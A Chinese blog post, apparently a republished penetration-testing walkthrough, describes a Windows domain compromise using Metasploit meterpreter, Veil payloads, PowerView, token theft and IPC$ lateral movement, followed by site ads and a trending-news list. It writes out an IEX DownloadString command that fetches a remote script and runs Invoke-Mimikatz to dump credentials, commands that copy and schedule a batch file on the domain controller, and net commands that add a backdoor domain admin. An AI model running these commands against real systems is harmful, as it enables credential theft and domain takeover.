Metasploit域渗透测试全程实录(终结篇)
本文作者:i春秋签约作家——shuteer
前言内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。相关知识点总结如下:
- 免杀payload的生成,请使用Veil
- msf在meterpreter下的提权尝试
- msf在meterpreter下的bypassuac尝试
- 内网渗透测试过程中的信息关联
- meterpreter的路由添加以及相关扫描
- Powershell在meterpreter下面的使用
- Meterpreter的post模块使用
- Msf的custom自己生成的payload的使用
- 进程注入窃取令牌
其实重点不在于知识的多少,大家只需关注比较重点的连接点。分享为了方便大家以后一起交流,一起学习,一起进步。首先shell是别人给我的,也不是这里介绍的重点,所以在此忽略。渗透测试的环境详细如下: A 堡垒机(webshell所在机器):windows server 2012 B 堡垒机:windows 2008(powershell扫描机器) C 堡垒机:有域管理进程的机器windows server 2012 D 堡垒机若干 第八步 Poershell获取域控管理员在线的机器 内网渗透测试不得不说到两大神器:msf和powershell,但是看大家基本上都是分开来使用的,或者说大家在一次渗透测试的过程中很少遇到,今天作为读者的你有福了。
首先来讲讲powershell的在内网渗透测试中不仅能扫,能爆,能转发,当然还能做更多的事情,一般使用到的模块有下面三个:1 Empire据说是神器,也确实是神器,我没使用过,暂时不多说 2 PowerUp 据说提权神器,也确实是神器,我很少使用。也暂时不多说 3 PowerView 据说是域渗透神器,也确实是神器,我一直用,非常漂亮
来说说powershell的使用,其实也很简单,只是大家在用的过程中一般没有太多的注意,主要有三种方式来调用:1 当然是下载到本地执行,详细使用方法如后面连接:powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://is.gd/oeoFuI‘); Invoke-Mimikatz -DumpCreds” 2 第二种方式是把powershell文件上传到堡垒机本地执行, powershell.exe -exec bypass -Command “& {Import-Module .\powerview.ps1; Invoke-UserHunter}” 3 上传到对方本地,然后Import-Module导入,使用。 PowerView的所有模块使用其实很简单,直接调用方法,大家看看下面的图就知道了。如果你能看到这里开始你的powershell之旅,内网将开始变得简单。



目前来看看我们遇到的问题,通过powershell成功获取到相关的域控管理员在线的一台机器windows server 2012,并且用这台机器的权限,那么接下来我们去搞定域控。思路如下:1 修改注册表等待域控管理员再次登录来抓取(黄花菜都会凉的) 2 通过PowerUp的进程来注入获取域权限(没使用过暂时放弃),当然此处也可以写类似外挂的功能注入进程获取权限 3 msf的令牌窃取功能(这个可以很容易实现)
知道思路,那么接下来就开始我们愉快的旅程吧。我要求师傅,求妹子,求神器,专业求到域控去:1 同样使用ipc经典入侵手法,反弹meterpreter, Getsysttem 权限 Ps 查看域管理所在的进程 Migrate pid注入进程 2 继续经典的IPC$到域控 Meterpreter下面shell Net use \\域控ip\c$ Net time \\域控ip Copy bat.bat \\域控ip\c$ At \\域控ip time c:\bat.bat(意料之外的错误,提示schtasks.exe,不熟) 3 通往成功的路不只有一条,添加域管账户 Net user demo demo /ad /domain Net group “domain admins” demo /ad /domain 到了此刻,我们已经拥有域管权限了。详细的截图如下:











关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 习近平和青年朋友的10个暖心瞬间 7904748
- 2 贵州游船倾覆事故已造成3人死亡 7808403
- 3 外交部国防部罕见接连发声 7714471
- 4 这个五一的文旅体验不要太丰富 7616375
- 5 300亿饮料巨头进军半导体 7521492
- 6 乙游逐渐成年轻人的恋爱代餐 7424682
- 7 女子在沙滩玩20分钟捡了小半兜钉子 7328803
- 8 景区飞天魔毯失控 多名游客被甩出 7231557
- 9 网红猫爷掀起猫步模仿潮 7135408
- 10 三个“爆品” 藏着中国外贸秘籍 7039774